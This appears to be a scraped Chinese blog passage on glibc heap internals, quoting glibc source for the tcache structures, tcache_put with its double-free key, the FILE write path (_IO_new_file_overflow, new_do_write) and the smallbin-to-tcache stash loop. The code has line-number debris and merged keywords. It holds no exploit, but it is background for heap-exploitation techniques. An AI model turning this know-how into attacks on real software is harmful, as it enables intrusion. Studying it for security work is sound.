/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache. */ typedefstructtcache_entry { structtcache_entry *next; } tcache_entry;
1 2 3 4 5 6 7 8
/* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct"). Keeping overall size low is mildly important. Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons. */ typedefstructtcache_perthread_struct { char counts[TCACHE_MAX_BINS]; tcache_entry *entries[TCACHE_MAX_BINS]; } tcache_perthread_struct;
typedefstructtcache_entry { structtcache_entry *next; /* This field exists to detect double frees. */ structtcache_perthread_struct *key; } tcache_entry;
next对应了malloc_chunk中的fd那个位置,key对应了bk的位置。
tcache_put函数针对key有了相关的更新:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
static __always_inline void tcache_put(mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *)chunk2mem(chunk); /* Mark this chunk as "in the tcache" so the test in _int_free will detect a double free. */ e->key = tcache; //将key标记为对应的tcache e->next = tcache->entries[tc_idx]; tcache->entries[tc_idx] = e; ++(tcache->counts[tc_idx]); }
int _IO_new_file_overflow (_IO_FILE *f, int ch) { if (f->_flags & _IO_NO_WRITES) { f->_flags |= _IO_ERR_SEEN; __set_errno (EBADF); return EOF; } /* If currently reading or no buffer allocated. */ if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL) { : : } if (ch == EOF) return _IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base);
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
static _IO_size_t new_do_write(_IO_FILE *fp, constchar *data, _IO_size_t to_do) { _IO_size_t count; if (fp->_flags & _IO_IS_APPENDING) /* On a system without a proper O_APPEND implementation, you would need to sys_seek(0, SEEK_END) here, but is not needed nor desirable for Unix- or Posix-like systems. Instead, just indicate that offset (before and after) is unpredictable. */ fp->_offset = _IO_pos_BAD; elseif (fp->_IO_read_end != fp->_IO_write_base) { ............ } count = _IO_SYSWRITE (fp, data, to_do);
#if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim; /* While bin not empty and tcache not full, copy chunks over. */ while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last (bin)) != bin) { if (tc_victim != 0) { bck = tc_victim->bk; set_inuse_bit_at_offset (tc_victim, nb); if (av != &main_arena) set_non_main_arena (tc_victim); bin->bk = bck; bck->fd = bin; tcache_put (tc_victim, tc_idx); } }